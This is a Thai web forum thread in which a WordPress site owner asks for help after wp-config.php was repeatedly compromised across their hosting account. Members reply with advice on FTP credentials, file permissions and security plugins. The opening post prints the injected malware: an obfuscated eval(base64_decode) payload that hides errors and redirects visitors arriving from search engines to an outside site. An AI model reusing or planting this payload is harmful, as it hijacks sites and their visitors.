ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptwp-config.php โดน 3 รอบแล้วครับโดน hack ทั้งโฮตเลย
หน้า: [1] 2   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: wp-config.php โดน 3 รอบแล้วครับโดน hack ทั้งโฮตเลย  (อ่าน 4925 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« เมื่อ: 20 ตุลาคม 2012, 14:07:04 »

โค๊ด:
[code] eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9ybmQuamt1Yi5jb20vIik7CmV4aXQoKTsNCn0KfQ0KfQ0KfQ0KfQ=="));
[/code]


ปัญหาเดียวกัน
http://www.thaiseoboard.com/index.php/topic,292003.0.html

แต่ผมแก้แล้วก็เป็นอีกโดยมันเล่นงานไฟล์  wp-config.php 3 รอบแล้วครับโดนทั้งโฮต

ธีมตอนนี้ซื้อของแท้มาใช้ทั้ง 2 เว็บครับ พอจะมีวิธีป้องกันได้มั้ยครับ   wanwan017


FileZilla Client นี่แหละครับ ตัวปัญหา

ผมเลิกใช้ไปนานแล้ว


แล้วใช้ตัวไหนแทนครับ
« แก้ไขครั้งสุดท้าย: 20 ตุลาคม 2012, 22:09:43 โดย zumzam19 » บันทึกการเข้า
arzusa
ก๊วนเสียว
*

พลังน้ำใจ: 35
ออฟไลน์ ออฟไลน์

กระทู้: 441



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 20 ตุลาคม 2012, 14:32:57 »

จากใจ developer ผมยอมรับว่า theme บน wordpress ทำได้ทุกอย่าง เพราะ wordpress โยนทุกๆอย่างมาที่ theme หมด   wanwan007  แต่ก็อาจจะไม่ใช่ที่ theme ก็ได้
เครื่องที่ remote เข้า host สะอาดดีหรือยัง
บันทึกการเข้า

nongloma
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 104
ออฟไลน์ ออฟไลน์

กระทู้: 1,365



ดูรายละเอียด
« ตอบ #2 เมื่อ: 20 ตุลาคม 2012, 14:34:51 »

ต้องระวังเรื่องการ chmod777 ครับ
บันทึกการเข้า

ห้ามทำ link ไปเว็บที่มีการพนัน
lukplaz
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 282
ออฟไลน์ ออฟไลน์

กระทู้: 2,165



ดูรายละเอียด
« ตอบ #3 เมื่อ: 20 ตุลาคม 2012, 14:40:56 »

แก้ไงอ่ะคะ อยากรู้มือใหม่   wanwan019 wanwan019
บันทึกการเข้า
zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #4 เมื่อ: 20 ตุลาคม 2012, 14:44:43 »

จากใจ developer ผมยอมรับว่า theme บน wordpress ทำได้ทุกอย่าง เพราะ wordpress โยนทุกๆอย่างมาที่ theme หมด   wanwan007  แต่ก็อาจจะไม่ใช่ที่ theme ก็ได้
เครื่องที่ remote เข้า host สะอาดดีหรือยัง

ล้างเครืองใหม่หมดแล้วครับ

ต้องระวังเรื่องการ chmod777 ครับ

เปลี่ยนเมื่อกี่นี้เองครับ จาก 666 เป็น 644 ปกติผมจะตั้งให้เป็น 644 นี้นาไงเป็น 666 ได้

พอจะมีวิธีไหนป้องกันได้ไหมครับ  wanwan011

บันทึกการเข้า
NaiTan
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 378
ออฟไลน์ ออฟไลน์

กระทู้: 5,259



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 20 ตุลาคม 2012, 14:46:07 »

เปลี่ยนพาสล็อกอิน FTP ยัง
บันทึกการเข้า

zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #6 เมื่อ: 20 ตุลาคม 2012, 14:47:55 »

เปลี่ยนพาสล็อกอิน FTP ยัง

เปลียนแล้วครับ
บันทึกการเข้า
kiraoji
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 226
ออฟไลน์ ออฟไลน์

กระทู้: 1,681



ดูรายละเอียด
« ตอบ #7 เมื่อ: 20 ตุลาคม 2012, 14:49:25 »

มัน hack กันจ่ายขนาดนั้นเลย เหรอครับ  Tongue
บันทึกการเข้า
Legolas
Global Moderator
เจ้าพ่อบอร์ดเสียว
*****

พลังน้ำใจ: 886
ออฟไลน์ ออฟไลน์

กระทู้: 10,084



ดูรายละเอียด
« ตอบ #8 เมื่อ: 20 ตุลาคม 2012, 14:55:11 »

ปรกติใช้plugin พวก security บ้างเปล่าครับ ลองดาวโหลด https://www.wordfence.com/ ไปใช้ดูครับ จริงๆมีตัวอื่นๆอีกอย่าง http://wordpress.org/extend/plugins/bulletproof-security/   ตัวนี้ฝรั่งก็แนะนำให้ใช้ครับ
บันทึกการเข้า




ตอนนี้มีโปร $29.99 Creative Fabrica ถูกที่สุดสำหรับทำ POD,KDP
ขาย License wp theme 5 ธีมจา่ก Themeforest Newspaper, KALLYAS, Puzzle, Valenti, Jarida ราคาถูกมาก pm มาได้เลยครับ
รับทำ vdo avartar สำหรับนำเสนอ aff ต่างประเท
Freedomlover
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 207
ออฟไลน์ ออฟไลน์

กระทู้: 2,097



ดูรายละเอียด เว็บไซต์
« ตอบ #9 เมื่อ: 20 ตุลาคม 2012, 15:00:03 »

จาก code ที่แทรกเข้ามา ที่ผมเคยเจอ มีแต่เข้ามาทาง ftp ครับ   ไม่ทราบว่าใช้โปรแกรมอะไรในการ ftp เข้ามาครับ  มี crack หรือไม่


ลองให้ทางผู้ให้บริการช่วยเช็คให้ก็ได้ครับ ว่าเข้ามาทางไหน
« แก้ไขครั้งสุดท้าย: 20 ตุลาคม 2012, 15:00:41 โดย Freedomlover » บันทึกการเข้า

โฮสติ้ง คุณภาพสูง ราคาเริ่มต้น 50 บาท/เดือน ทดลองใช้ฟรี 30 วัน
SSD VPS แรงๆ
จดโดเมนเพียง 400 บาท/ปี
ด้วยประสบการณ์กว่า 12 ปี  Tel 0840640213
zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #10 เมื่อ: 20 ตุลาคม 2012, 15:00:18 »

ปรกติใช้plugin พวก security บ้างเปล่าครับ ลองดาวโหลด https://www.wordfence.com/ ไปใช้ดูครับ จริงๆมีตัวอื่นๆอีกอย่าง http://wordpress.org/extend/plugins/bulletproof-security/   ตัวนี้ฝรั่งก็แนะนำให้ใช้ครับ


ขอบคุณมากครับ ว่าแต่มันเลนงานทั้งโฮตผมเลยนะครับ  wanwan010
บันทึกการเข้า
zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #11 เมื่อ: 20 ตุลาคม 2012, 15:01:17 »

จาก code ที่แทรกเข้ามา ที่ผมเคยเจอ มีแต่เข้ามาทาง ftp ครับ   ไม่ทราบว่าใช้โปรแกรมอะไรในการ ftp เข้ามาครับ  มี crack หรือไม่


ลองให้ทางผู้ให้บริการช่วยเช็คให้ก็ได้ครับ ว่าเข้ามาทางไหน
ผมใช้ FileZilla Client ครับ
บันทึกการเข้า
iCafe
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 123
ออฟไลน์ ออฟไลน์

กระทู้: 1,822



ดูรายละเอียด เว็บไซต์
« ตอบ #12 เมื่อ: 20 ตุลาคม 2012, 15:03:22 »

ทั้ง host นี่คือทั้งเครื่องใช่มั้ย ถ้าใช่ให้เชคระบบเลยน่าจะรั่ว
บันทึกการเข้า

zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #13 เมื่อ: 20 ตุลาคม 2012, 15:08:51 »

ทั้ง host นี่คือทั้งเครื่องใช่มั้ย ถ้าใช่ให้เชคระบบเลยน่าจะรั่ว

เฉพาะเว็บที่อยู่ในโฮตตัวที่ผมซื้อมาใช้ มีสองเว็บโดนหมดครับ  wanwan010
บันทึกการเข้า
Normaderm
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 181
ออฟไลน์ ออฟไลน์

กระทู้: 3,977



ดูรายละเอียด เว็บไซต์
« ตอบ #14 เมื่อ: 20 ตุลาคม 2012, 15:43:33 »

คอมติดไวรัสรึปล่าวครับ ปัญหานี้ผมเคยเจอ

เกิดจากคอมติดไวรัส ทำให้โดนส่งพาสไป
บันทึกการเข้า

flash
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 1,022



ดูรายละเอียด เว็บไซต์
« ตอบ #15 เมื่อ: 20 ตุลาคม 2012, 15:53:34 »

อันตรายจริงๆ ครับ
บันทึกการเข้า

ครีมหมอจุฬา ผ่าน อย. อยากหน้าใส ไร้รอยด่างดำ ครีมหมอจุฬาซื้อที่ไหน หาไม่ยากเลย แต่ระวังของปลอมนะ ของเราเป็น ครีมหมอจุฬาของแท้ 100% มาดูสินค้าก่อนได้

zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #16 เมื่อ: 20 ตุลาคม 2012, 16:30:11 »

คอมติดไวรัสรึปล่าวครับ ปัญหานี้ผมเคยเจอ

เกิดจากคอมติดไวรัส ทำให้โดนส่งพาสไป

ไม่น่าจะติดนะครับเพราะล้างเครื่องใหม่หมดแล้วนะครับ
บันทึกการเข้า
Doytao
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 44
ออฟไลน์ ออฟไลน์

กระทู้: 1,234



ดูรายละเอียด
« ตอบ #17 เมื่อ: 20 ตุลาคม 2012, 16:41:59 »

FileZilla Client นี่แหละครับ ตัวปัญหา

ผมเลิกใช้ไปนานแล้ว
บันทึกการเข้า
kotchakorn
ก๊วนเสียว
*

พลังน้ำใจ: 7
ออฟไลน์ ออฟไลน์

กระทู้: 215



ดูรายละเอียด เว็บไซต์
« ตอบ #18 เมื่อ: 20 ตุลาคม 2012, 16:57:45 »

คนดูเป็นเค้าก็รู้เนาะว่ามีคนขโมยข้อมูลในโฮสส่วนเราสงสัยคงไม่มีเหลือเพราะดูอะไรไม่รุ้เรื่องเลย wanwan010
บันทึกการเข้า

zumzam19
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 404



ดูรายละเอียด
« ตอบ #19 เมื่อ: 20 ตุลาคม 2012, 22:06:30 »

FileZilla Client นี่แหละครับ ตัวปัญหา

ผมเลิกใช้ไปนานแล้ว

แล้วใช้ตัวไหนแทนครับ
บันทึกการเข้า
หน้า: [1] 2   ขึ้นบน
พิมพ์